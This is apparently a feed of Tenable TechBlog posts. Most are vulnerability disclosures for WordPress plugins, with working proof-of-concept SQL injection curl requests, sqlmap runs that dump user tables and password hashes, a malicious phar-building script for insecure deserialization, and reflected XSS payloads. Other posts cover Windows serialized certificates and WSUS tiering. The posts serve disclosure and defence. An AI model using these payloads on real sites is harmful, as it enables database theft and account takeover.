We have seen together that several built-in Entra roles can be leveraged by attackers to abuse the federation feature to elevate their privileges and persist in an Entra tenant. Of course, the most famous role, Global Administrator, is one of them, but these can also be used: Security Administrator, Hybrid Identity Administrator, External Identity Provider Administrator, Domain Name Administrator, and Partner Tier2 Support. Microsoft still has not identified all of them as privileged, so be careful when assigning these roles in your organization: assigned users may have more power than you think! 💥

Entra Roles Allowing To Abuse Entra ID Federation for Persistence and Privilege Escalation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360)

2 January 2024 at 19:58

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360)

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze an unauthenticated sql injection vulnerability found in the MyCalendar plugin.

This was discovered by Tenable Research while working on web application security.

Tenable TRA :
Affected Versions: < 3.4.22
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVSSv3 Score: 8.6

My Calendar does WordPress event management with richly customizable ways to display events. The plugin supports individual event calendars within WordPress Multisite, multiple calendars displayed by categories, locations or author, or simple lists of upcoming events.

Vulnerable Code:

The vulnerability is present in the function my_calendar_get_events() of ./my-calendar-events.php file which is called when a request is made to the function my_calendar_rest_route() of ./my-calendar-api.php file.

Here is the interesting code part, it is quite huge so I just have to keep the interesting part for the article :

// ./my-calendar-events.php
function my_calendar_rest_route( WP_REST_Request $request ) {
$parameters = $request->get_params();
$from = sanitize_text_field( $parameters['from'] );
$to = sanitize_text_field( $parameters['to'] );

$events = my_calendar_events( $args );

return $events;

function my_calendar_events( $args ) {
$events = my_calendar_get_events( $args );


// ./my-calendar-api.php
function my_calendar_get_events( $args ) {
$from = isset( $args['from'] ) ? $args['from'] : '';
$to = isset( $args['to'] ) ? $args['to'] : '';


$from = mc_checkdate( $from );
$to = mc_checkdate( $to );
if ( ! $from || ! $to ) {
return array();

WHERE $select_published $select_category $select_location $select_author $select_host $select_access $search
AND ( DATE(occur_begin) BETWEEN '$from 00:00:00' AND '$to 23:59:59'
OR DATE(occur_end) BETWEEN '$from 00:00:00' AND '$to 23:59:59'
OR ( DATE('$from')
[ ...]

return apply_filters( 'mc_filter_events', $arr_events, $args, 'my_calendar_get_events' );

When we look at the function in its entirety, the first thing that catches our eye is to see that raw SQL queries without the use of wpdb->prepare() are executed with variables such as from & to which correspond to user inputs.

Looking at the code, can see that mc_checkdate() is called on from & to and if the result is not valid for both, a return is made before executing the SQL query.

Let’s take a closer look at this function :

function mc_checkdate( $date ) {
$time = strtotime( $date ); # <= Is a bool(false). The error is actually here, this is what allows the payload to pass
$m = mc_date( 'n', $time ); # <= eq to 11
$d = mc_date( 'j', $time ); # <= eq to 23 (current day number)
$y = mc_date( 'Y', $time ); # <= eq to 2023

// checkdate is a PHP core function that check the validity of the date
return checkdate( $m, $d, $y ); # <= So this one eq 1

function mc_date( $format, $timestamp = false, $offset = true ) {
if ( ! $timestamp ) {
$timestamp = time();
if ( $offset ) {
$offset = intval( get_option( 'gmt_offset', 0 ) ) * 60 * 60; # <= No importance for the test, we can leave it at 0
} else {
$offset = 0;
$timestamp = $timestamp + $offset;

# So in the end returns the value of gmdate( $format, $timestamp );
return ( '' === $format ) ? $timestamp : gmdate( $format, $timestamp );

For simplicity, we can take the vulnerable code locally to observe a more detailed behavior :

This simple error therefore allows our SQL payload to bypass this check and be inserted into the SQL query.

Proof of Concept:

time curl "https://WORDPRESS_INSTANCE/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)+AND+'a'%3d'a"
real 0m3.068s
user 0m0.006s
sys 0m0.009s


sqlmap -u "*" --current-db --dbms=MySQL
___ ___[']_____ ___ ___ {1.7.9#pip}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:48:00 /2023-12-21/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[09:48:02] [INFO] testing connection to the target URL
[09:48:08] [INFO] URI parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="to")
[09:48:08] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:48:38] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:48:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:48:54] [INFO] fetching current database
[09:48:54] [INFO] retrieved: 'wasvwa'
current database: 'wasvwa'

Patch :

For backwards compatibility reasons, the author of the plugin decided to modify the mc_checkdate() function rather than using wpdb->prepare()

function mc_checkdate( $date ) {
$time = strtotime( $date );
$m = mc_date( 'n', $time );
$d = mc_date( 'j', $time );
$y = mc_date( 'Y', $time );

$check = checkdate( $m, $d, $y );
if ( $check ) {
return mc_date( 'Y-m-d', $time, false );

return false;

Adding this additional check is sufficient to correct the vulnerability.

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Code for Reading Windows Serialized Certificates

Problem description

On a Windows machine, we can find users’ certificates stored in files in C:\Users\<USER>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates (i.e. “%APPDATA%\Microsoft\SystemCertificates\My\Certificates”). These files have seemingly random names (i.e. “3B86DFC25CFB1B47EB4CBF53FD4028239D0C690E”) and no extension. What is their format? How to open them in code? With which Windows APIs? 🤔

Let me spoil you with the answers right away, including code samples, and I’ll describe after what I tried and what I learned 💡

Answer: “serialized certificates” that can be opened using the CryptQueryObject() function

These files are “serialized certificates”. Surprisingly, even with this knowledge which wasn’t easy to discover, I did not find any Windows CryptoAPI function to directly open them!

Until I found CryptQueryObject: a very handy function that can open crypto objects with different formats. We can specify with the “dwExpectedContentTypeFlags” parameter the format(s) we expect, or accept all formats, and see what it detects. It returns notably:

  • pdwContentType: equal to “CERT_QUERY_CONTENT_SERIALIZED_CERT” in this case meaning that “the content is a serialized single certificate.”
  • ppvContext: pointer to a CERT_CONTEXT structure, in this case of a serialized certificate, which contains in particular:
  • pCertInfo: many metadata on the certificate with a CERT_INFO structure
  • pbCertEncoded: the certificate itself, so what we would expect to find in a classic .crt file

Simplified example usage:

CERT_CONTEXT* certContext = NULL;
if (!CryptQueryObject(
(const void**)&certContext
) || certContext == NULL)
if (certContext) CertFreeCertificateContext(certContext);
return false;

Alternative with the CertAddSerializedElementToStore() function

There’s also an alternative. By searching for CryptoAPI functions related to “serialized certificates” we can find this function: CertAddSerializedElementToStore. It can deal with such certificates but only to load them into a store… So, the idea is to:

  1. create a temporary store in memory, using CertOpenStore with “CERT_STORE_PROV_MEMORY” and “CERT_STORE_CREATE_NEW_FLAG
  2. load the serialized certificate into this temp store, using CertAddSerializedElementToStore
  3. this function returns the desired CERT_CONTEXT structure of the certificate (like above) in “ppvContext

It works properly and we get the same results, but it’s longer and less efficient I think.

How did I find that they are “serialized certificates”?

I found a comment online saying that we can open them in Windows by assigning them the “.sst” extension, which then allows to open them with a double-click. We can see in the explorer that this extension corresponds to “Microsoft Serialized Certificate Store”.

Knowing this, I found the CertOpenStore CryptoAPI function that seemed capable of opening those “Microsoft Serialized Certificate Store” files, but it refused to open this file…

I didn’t understand why, so I created a certificate store in memory and used the CertSaveStore function to export it as a serialized certificate store. And indeed, its content did not have exactly the same format. There was some header at the beginning, before the content with the same format as the one I had in the files I wanted to analyze. My guess was that this header was the certificate store header, and the rest was actually just the serialized certificate saved in the store! And this guess was correct based on the results I got afterwards 😉

Of course I also tried first to load these files with other more common extensions, like .crt, .pfx, .p12, etc. but none worked.

Why not use CertEnumCertificatesInStore?

My initial need was to enumerate the certificates for all users on the machine (provided my code is running privileged of course) so I tried first to use CertOpenStore targeting the “CERT_SYSTEM_STORE_USERS” system store. But when enumerating the certificates, with CertEnumCertificatesInStore, it did not return these certificates that I knew existed since I could see them in the certificates manager (certmgr.msc) when logged in as each user.

I discovered this issue when using Benjamin @gentilkiwi Delpy’s “mimikatz” tool. Of course Benjamin loves certificates and so he included an entire “crypto” module in his famous tool. (Yeah, it’s a good reminder that it has many other usages than just dumping credentials! 😉). The “crypto::certificates” command, which uses CertEnumCertificatesInStore, could not find any certificate in the “My” certificate store of another user accessed through the “CERT_SYSTEM_STORE_USERS” system store and as admin of course:

Even though there was indeed a certificate to see:

Actually, I could find the certificates when running as each user, and targeting the “CERT_SYSTEM_STORE_CURRENT_USER” system store:

So, it confirmed that the “CERT_SYSTEM_STORE_USERS” system store has a limitation. The only online confirmation I found is an 18 years old 😯 newsgroup post from a then Microsoft employee:

CERT_SYSTEM_STORE_USERS opens the registry stroes. so you can NOT use MY store with it.

What I noticed too is that, when using “CERT_SYSTEM_STORE_USERS”, it only goes looking for certificates into the registry only, and there’s none in this case. So these certificates, that are on disk only, are missed when using “CERT_SYSTEM_STORE_USERS”:

Whereas, it looks for certificates in the registry and on disk when using “CERT_SYSTEM_STORE_CURRENT_USER”:

Alternatives for parsing these certificates without the CryptoAPI

In particular, Benjamin @gentilkiwi Delpy kindly answered my question, and told me that there is the “crypto::system” mimikatz command which allows to parse these certificates, like this:

The code shows that he actually implemented the entire parsing himself without relying on Windows APIs! This is very interesting to discover how it works, and it can also be helpful for research, but I preferred to stick to the official CryptoAPI functions, or at least Windows APIs, to open these certificates. However, this alternative is worth mentioning!

Edit: it was brought to my attention that this article “Extracting Certificates From the Windows Registry” may cover the same topic, but I did not double-check their results. I also preferred to use an official Windows API instead of a custom parsing.

Code for Reading Windows Serialized Certificates was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326)

WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326)

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze an unauthenticated insecure deserialization vulnerability found in the in the BuddyForm plugin.

Affected Versions: < 2.7.8
CVSSv3 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 8.1

BuddyForms is a simple drag and drop form builder with ready to use form templates that give you all the form types with on click.

In the vulnerable versions, the problem lies in the ‘buddyforms_upload_image_from_url()’ function of the ‘./includes/functions.php’ file

function buddyforms_upload_image_from_url() {
$url = isset( $_REQUEST['url'] ) ? wp_kses_post( wp_unslash( $_REQUEST['url'] ) ) : '';
$file_id = isset( $_REQUEST['id'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['id'] ) ) : '';
$accepted_files = isset( $_REQUEST['accepted_files'] ) ? explode( ',', buddyforms_sanitize( '', wp_unslash( $_REQUEST['accepted_files'] ) ) ) : array( 'jpeg' );

if ( ! empty( $url ) && ! empty( $file_id ) ) {
$upload_dir = wp_upload_dir();
$image_url = urldecode( $url );
$image_data = file_get_contents( $image_url ); // Get image data
$image_data_information = getimagesize( $image_url );
$image_mime_information = $image_data_information['mime'];

if ( ! in_array( $image_mime_information, $accepted_files ) ) {
echo wp_json_encode(
'status' => 'FAILED',
'response' => __(
'File type ' . $image_mime_information . ' is not allowed.',

if ( $image_data && $image_data_information ) {
$file_name = $file_id . '.png';
$full_path = wp_normalize_path( $upload_dir['path'] . DIRECTORY_SEPARATOR . $file_name );
$upload_file = wp_upload_bits( $file_name, null, $image_data );
if ( ! $upload_file['error'] ) {
$wp_filetype = wp_check_filetype( $file_name, null );
$attachment = array(
'post_mime_type' => $wp_filetype['type'],
'post_title' => preg_replace( '/\.[^.]+$/', '', $file_name ),
'post_content' => '',
'post_status' => 'inherit',
$attachment_id = wp_insert_attachment( $attachment, $upload_file['file'] );
$url = wp_get_attachment_thumb_url( $attachment_id );
echo wp_json_encode(
'status' => 'OK',
'response' => $url,
'attachment_id' => $attachment_id,


This function has several problems that allow to perform an insecure deserialization in several steps.

  1. The ‘url’ parameter’ accept an arbitrary value, no verification is done
  2. The ‘accepted_files’ parameter can be added to the request to specify an arbitrary mime type which allows to bypass the mime verification type
  3. The PHP function ‘getimagesize()’ is used, this function does not check the file and therefore assumes that it is an image that is passed to it. However, if a non-image file is supplied, it may be incorrectly detected as an image and the function will successfully return
  4. The PHP function ‘file_get_contents()’ is used without any prior check. This function allows the use of the ‘phar://’ wrapper. The Phar (PHP Archive) files contain metadata in serialized format, so when they are parsed, this metadata is deserialized.

If all conditions are met, the file is downloaded and stored on the server and the URL of the image is returned to the user.

The exploitation of this vulnerability is based on 3 steps

  1. Create a malicious phar file by making it look like an image.
  2. Send the malicious phar file on the server
  3. Call the file with the ‘phar://’ wrapper.

The main difficulty in exploiting this vulnerability is to find a gadget chain. There are several known gadgets chain for WordPress but they are no longer valid on the latest versions.

The plugin itself does not seem to contain any gadget chain either. So, in order to trigger the vulnerability we will simulate the presence of a plugin allowing the exploitation.

So we can add a fake WordPress extension named “dummy”, which contains only a file “dummy.php” with the following code :

Plugin Name: Dummy

class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");

function display_hello_world() {
echo "Hello World";

add_action('wp_footer', 'display_hello_world');

Proof Of Concept

The first step of our exploitation is to create our malicious phar archive which will have to pretend to be an image :


class Evil{
public function __wakeup() : void {
die("Arbitrary Deserialization");

//create new Phar
$phar = new Phar('evil.phar');
$phar->addFromString('test.txt', 'text');
$phar->setStub("GIF89a\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new Evil();

Note the presence of ‘GIF89a’ which will make the plugin believe that our file is a GIF image

root@vmi652687:/tmp# php --define phar.readonly=0 evil.php
root@vmi652687:/tmp# strings evil.phar
<?php __HALT_COMPILER(); ?>

So as a reminder, our WordPress installation has two plugins, BuddyForms as well as our ‘dummy’ plugin which simulates a vulnerable plugin allowing a gadget chain

We send our file to the server via a POST request containing the correct parameters expected by the function described above

The server answers OK and tells us that the file is available at the URL http://domain.tld/wp-content/uploads/2023/02/1.png which can be checked by opening the corresponding folder in your browser

So we just have to do the same action again, except that this time we will use the phar:// wrapper in the URL and indicate the path of our file.

By chance, the structure of wordpress folders is always the same, you just have to go up one folder to access wp-content. So, it is possible to use the relative path to our file stored on the server

And voila, we managed to trigger an arbitrary deserialization

As sometimes a picture is worth a thousand words, here is a diagram that summarizes the explanation

The fix

In version 2.7.8, the author has made a simple fix, just check if the ‘phar://’ wrapper is used

if ( strpos( $valid_url, 'phar://' ) !== false ) {

In my opinion, this correction seems insufficient because the downloaded file is still not verified, it would still be possible to exploit the vulnerability if another plugin allows to call an arbitrary file.

[EDIT] : Jesús Calderón identified a bypass for this fix. The check added, does not check that the value of ‘$valid_url’ is decoded
So, is possible to use the following payload :


WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Multiples WordPress plugins CVE analysis

24 January 2023 at 20:09

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze several vulnerabilities found in different WordPress plugins :

CVE-2023–23488 : Paid Memberships Pro < 2.9.8 — Unauthenticated SQL Injection

Affected Versions: < 2.9.8
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 9.8

Paid Memberships Pro gives you all the tools you need to start, manage, and grow your membership site. The plugin is designed for premium content sites, online course or LMS and training-based memberships, clubs and associations, members-only product discount sites, subscription box products, paid newsletters, and more.

The plugin does not escape the ‘code’ parameter in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection.

Vulnerable Code:

This vulnerability is present in the ‘./classes/class.memberorder.php’

Returns the order using the given order code.
function getMemberOrderByCode($code)
global $wpdb;
$id = $wpdb->get_var("SELECT id FROM $wpdb->pmpro_membership_orders WHERE code = '" . $code . "' LIMIT 1");
return $this->getMemberOrderByID($id);
return false;

The ‘$code’ parameter is inserted into the SQL query without cleaning it first or using “$wpdb->prepare” which permit to prepares a SQL query for safe execution.

Proof of Concept:

time curl "http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(1)))a)--%20-"
real 0m3.068s
user 0m0.006s
sys 0m0.009s


# sqlmap -u "*" --dbms=MySQL -dump -T wp_users

Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:' AND (SELECT 2555 FROM (SELECT(SLEEP(5)))BnSC) AND 'SsRo'='SsRo
[15:23:35] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[15:23:51] [INFO] confirming MySQL
[15:23:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:24:21] [INFO] adjusting time delay to 1 second due to good response times
[15:24:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:24:21] [INFO] fetching columns for table 'wp_users' in database 'wasvwa'
[15:36:26] [INFO] retrieved: admin
[15:37:09] [INFO] retrieved:
[15:37:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:37:09] [INFO] retrieved: [email protected]
[15:39:06] [INFO] retrieved: admin
[15:39:49] [INFO] retrieved: admin
[15:40:32] [INFO] retrieved: $P$BPEJq1QWmIm.EEKtbgj/ogVzxGPV4I/

CVE-2023–23489 : Easy Digital Downloads & — Unauthenticated SQL Injection

Affected Versions: &
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 9.8

Easy Digital Downloads is a complete eCommerce solution for selling digital products on WordPress.

The plugin does not escape the ‘s’ parameter in one of its ajax actions before using it in a SQL statement, leading to a SQL injection.

Vulnerable Code:

The vulnerable part of the code corresponds to the ‘edd_ajax_download_search()’ function of the ‘./includes/ajax-functions.php’ file

function edd_ajax_download_search() {
// We store the last search in a transient for 30 seconds. This _might_
// result in a race condition if 2 users are looking at the exact same time,
// but we'll worry about that later if that situation ever happens.
$args = get_transient( 'edd_download_search' );

// Parse args
$search = wp_parse_args( (array) $args, array(
'text' => '',
'results' => array()
) );

// Get the search string
$new_search = isset( $_GET['s'] )
? sanitize_text_field( $_GET['s'] )
: '';

// Default query arguments
$args = array(
'orderby' => 'title',
'order' => 'ASC',
'post_type' => 'download',
'posts_per_page' => 50,
'post_status' => implode( ',', $status ), // String
'post__not_in' => $excludes, // Array
'edd_search' => $new_search, // String
'suppress_filters' => false,

// Get downloads
$items = get_posts( $args );


Contrary to what one might think, the use of ‘sanitize_text_field()’ does not protect against SQL injections, this core function is in charge of

  • Checks for invalid UTF-8
  • Converts single < characters to entities
  • Strips all tags
  • Removes line breaks, tabs, and extra whitespace
  • Strips octets

The value of parameter ‘s’ is added to the variable ‘$args’ which is an array used in the call to the WordPress Core function ‘get_posts()’.

// File wp-includes/post.php
// This core function performs the SQL query but does not apply any filtering

function get_posts( $args = null ) {


$get_posts = new WP_Query;
return $get_posts->query( $parsed_args );


Although get_posts() is a WordPress Core function, it is not recommended because get_posts bypasses some filter. See 10up Engineering Best Practices

Proof of Concept:
Note: The same SQL injection/unique request will not work twice in a row right away, as the ‘edd_ajax_download_search()’ function stores the most recent search for 30 seconds (so to run the same payload again, you will have to modify the payload slightly or wait 30 seconds).

time curl "http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
real 0m2.062s
user 0m0.006s
sys 0m0.009s

CVE-2023–23490 : Survey Maker Authenticated SQL Injection

Affected Versions: < 3.1.2
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 8.8

WordPress Survey plugin is a powerful, yet easy-to-use WordPress plugin designed for collecting data from a particular group of people and analyze it. You just need to write a list of questions, configure the settings, save and paste the shortcode of the survey into your website.

The plugin does not escape the ‘surveys_ids’ parameter in the ‘ays_surveys_export_json’ action before using it in a SQL statement, leading to an authenticated SQL injection vulnerability.

The vulnerability requires the attacker to be authenticated but does not require administrator privileges, the following example uses an account with the ‘subscriber’ privilege level.

Subscribers have the fewest permissions and capabilities of all the WordPress roles. It is the default user role set for new registrations.

Vulnerable Code:

public function ays_surveys_export_json() {
global $wpdb;

$surveys_ids = isset($_REQUEST['surveys_ids']) ? array_map( 'sanitize_text_field', $_REQUEST['surveys_ids'] ) : array();

$where = '';
$where = " WHERE id IN (". implode(',', $surveys_ids) .") ";


$sql_surveys = "SELECT * FROM ".$surveys_table.$where;
$surveys = $wpdb->get_results($sql_surveys, 'ARRAY_A');

The part of the vulnerable code corresponds to the ‘ays_surveys_export_json()’ function of the ‘./admin/class-survey-maker-admin.php’ file.

The request is executed without having used $wpdb->prepare() first

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=ays_surveys_export_json&surveys_ids[0]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(3)))a)--+-"
real 0m3.056s
user 0m0.006s
sys 0m0.009s


The vulnerability can also be exploited in error based which facilitates the extraction of data via a tool such as SQLmap

# sqlmap -u "" --cookie="wordpress_e38c3ed8043e3ddf7aa8d7615bce358e=subscriber%7C1674054590%7Cg9hsFPDo9po0OPeS4HN1MuwSbOe3rJ5Y3zunH2z9RD6%7C96429535ce78881cd6f4f4d5c8213b64d75266a7731e3e4d7975f63591d3b3a2" --data="action=ays_surveys_export_json&surveys_ids[0]=1" -p 'surveys_ids[0]' --technique E --dump -T wp_users

Database: wasvwa
Table: wp_users
[2 entries]
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
| 1 | | $P$BPEJq1QWmIm.EEKtbgj/ogVzxGPV4I/ | [email protected] | admin | 0 | admin | admin | 2023-01-16 13:27:28 | <blank> |
| 2 | <blank> | $P$Bo.y4/hfFQWGXUBKrDxivIJImGYEXM. | [email protected] | subscriber | 0 | subscriber | subscriber | 2023-01-16 13:27:39 | <blank> |

CVE-2023–23491 : Quick Event Manager < 9.7.5 Unauthenticated Reflected Cross-Site Scripting

Affected Versions: < 9.7.5
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSSv3 Score: 6.1

A quick and easy to use event creator. Just add new events and publish. The shortcode lists all the events.

The plugin uses the value of the ‘category’ parameter in the response without prior filtering. The vulnerability does not require authentication to be exploited.

Vulnerable Code:

The vulnerable code is present in the function ‘qem_show_calendar()’ of the file ‘legacy/quick-event-manager.php’

// Builds the calendar page
function qem_show_calendar( $atts )
global $qem_calendars ;


$category = '';


if ( isset( $_REQUEST['category'] ) ) {
$category = $_REQUEST['category'];

$calendar .= "\r\n<script type='text/javascript'>\r\n";
$calendar .= "\tqem_calendar_atts[{$c}] = " . json_encode( $atts ) . ";\r\n";
$calendar .= "\tqem_month[{$c}] = {$currentmonth};\r\n";
$calendar .= "\tqem_year[{$c}] = {$currentyear};\r\n";
$calendar .= "\tqem_category[{$c}] = '{$category}';\r\n";
$calendar .= "</script>\r\n";


return $calendar . "</div>";

It’s possible to use the following payload which is reflected in the HTML :


Although the value is inserted in a Javascript variable between simple quotes and it does not seem possible to escape it, the first closing tag ‘</script>’ will have priority in the HTML of the page despite being in a string and allows escaping the context in order to inject arbitrary Javascript code.

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=</script><script>alert(1)</script>&qemyear=a
<div class="qem_calendar" id="qem_calendar_0"><a name="qem_calreload"></a>
<script type='text/javascript'>
qem_calendar_atts[0] = [];
qem_month[0] = 1;
qem_year[0] = ;
qem_category[0] = '</script><script>alert(1)</script>';

CVE-2023–23492 : Login With Form Number < 1.4.2 Unauthenticated Reflected Cross-Site Scripting

Affected Versions: < 1.4.2
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSSv3 Score: 6.1

A quick and easy to use event creator. Just add new events and publish. The shortcode lists all the events.

The ‘ID’ parameter of the ‘lwp_forgot_password’ action is used in the response without any filtering leading to an reflected XSS. Although the response is encoded in JSON, the Content-Type of the response is text/html which allows the exploitation of the vulnerability. This vulnerability is present in the ‘./login-with-phonenumber.php’ file in the ‘lwp_forgot_password()’ function.

Vulnerable Code:

Although the response is encoded in JSON, the Content-Type of the response is text/html which allows the exploitation of the vulnerability

function lwp_forgot_password()
$log = '';
if ($_GET['email'] != '' && $_GET['ID']) {
$log = $this->lwp_generate_token($_GET['ID'], $_GET['email'], true);


if ($_GET['phone_number'] != '' && $_GET['ID'] != '') {
$log = $this->lwp_generate_token($_GET['ID'], $_GET['phone_number']);

update_user_meta($_GET['ID'], 'updatedPass', '0');

echo json_encode([
'success' => true,
'ID' => $_GET['ID'],
'log' => $log,
'message' => __('Update password', $this->textdomain)

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(1)>
{"success": true, "ID":"<svg onload=alert(1)>", "log":"", "message:" "Update password"}

Multiples WordPress plugins CVE analysis was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Silo, or not silo, that is the question

18 January 2023 at 13:58


As we (security folks) were working on the hardening of WSUS update servers, we had to answer an interesting question dealing with how to best isolate a sensitive server like WSUS on on-premises Active Directory. The question was: should I put my WSUS server into my T0 silo?

Even if people are familiar with the concepts of Active Directory Tiering, a recurrent question remains: Knowing that an update server is considered as a critical asset (Tier 0), should authentication policies be applied to this kind of server, is it really relevant?

Imagine you are building a Tier 0 silo, you may intuitively think that putting most of the critical assets in a silo is a good administration practice.

That thought does not stop at the WSUS server, but extends to other critical assets like ADFS servers, ADCS, Exchange servers, servers running hypervisors and so on. For the purpose of this article, we will stick to the example of the WSUS server.

WSUS server in a nutshell

According to Microsoft documentation:

Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network.”.

In its simplest architecture, how does it work? Updates are downloaded from Microsoft’s update servers and stored locally on the WSUS server. From here, admins can approve the updates for deployment to their internal clients. Windows clients (desktops and servers) can check the local WSUS server for updates that have been approved and can download and install them.

The simplest WSUS architecture can be resumed as follows:

A bigger organization, with multiple geographical sites for example, may use more than one WSUS server. In this case, a tree architecture will be used with multiple downstream servers contacting an upstream server, this last one ultimately depending on the Microsoft upstream server:

Whatever the chosen architecture, we can see that a single WSUS server spreads patches across domains, or worse, across forests. This is even more dangerous across forests as a forest represents the security boundary.

This is the paradox of a WSUS server which is supposed to maintain a level of security through security updates, but which in reality can allow an elevation of privileges due to its centralized role and thus can break down network silos. As a consequence, if only one WSUS server is deployed for the whole Active Directory, administrators should consider such a server as Tier 0.

Silo, or not silo, that is the question

An authentication policy silo controls which accounts can be restricted by the silo and defines the authentication policies to apply to its members. An authentication policy defines the Kerberos protocol ticket-granting ticket (TGT) lifetime properties and authentication access control conditions for an account type. Kerberos is required for authentication policies to be effective. Linking a user account to an authentication policy silo allows to restrict interactive user sign-in to specific hosts.

What is important here is to remember that silos are here to protect from attackers escalating privilege and thus to prevent from pivoting from a lower privilege object to a higher one.

Critical assets should not expose their credentials to lower privilege assets. This introduces the Microsoft Tiering model, where high sensitivity assets are part of the Tier 0 (domain controllers, domain administrators, privileged access workstations, AD FS servers, AD CS servers, and so on…). Servers exposing less critical services are part of the Tier 1, and workstations are part of the Tier 2.

Apply authentication policies to all critical assets to protect them?

A common misunderstanding is that if we put most of the critical assets into an authentication strategies silo, they are protected by a kind of magic, meaning no attacker will be able to authenticate or to compromise a server part of a silo.

This is a wrong statement. Here are our thoughts.

Only users members of a silo can authenticate to computers belonging to this same silo.

This is not exactly true. On one hand, Kerberos armoring enforces a user’s TGT request from a computer member of the authentication policy silo. This mechanism ensures that the user is protected and is not able to “leak” his credentials on non-trusted computers, meaning on a computer from a lower Tier. On the other hand, it does not mean that users who are not members of a silo can not authenticate to a computer which is a member of that silo.

An attacker with valid credentials will still be able to authenticate.

Members of a silo can authenticate only to computers belonging to an authentication policy silo.

This is not exactly true. As seen above, as soon as a TGT is requested for a user member of a silo, if the request comes from a computer that is out of the silo, the interactive authentication will fail. An interactive session allows the user to benefit from the windows SSO. As a consequence, the credentials will be available in the LSASS process.

One statement here to remember is; Authentication policies are protecting users, not computers. Computers put the silo at risk.

When a computer is member of an authentication policy silo, this computer is automatically protected and hardened.

It is in fact the opposite. Intuitively people think that objects in a silo are protected, while they have to be even more hardened and firewalled. Why? Let’s take for example the case of a Tier 0 silo, meaning authentication policies are applied to the most critical Active Directory assets.

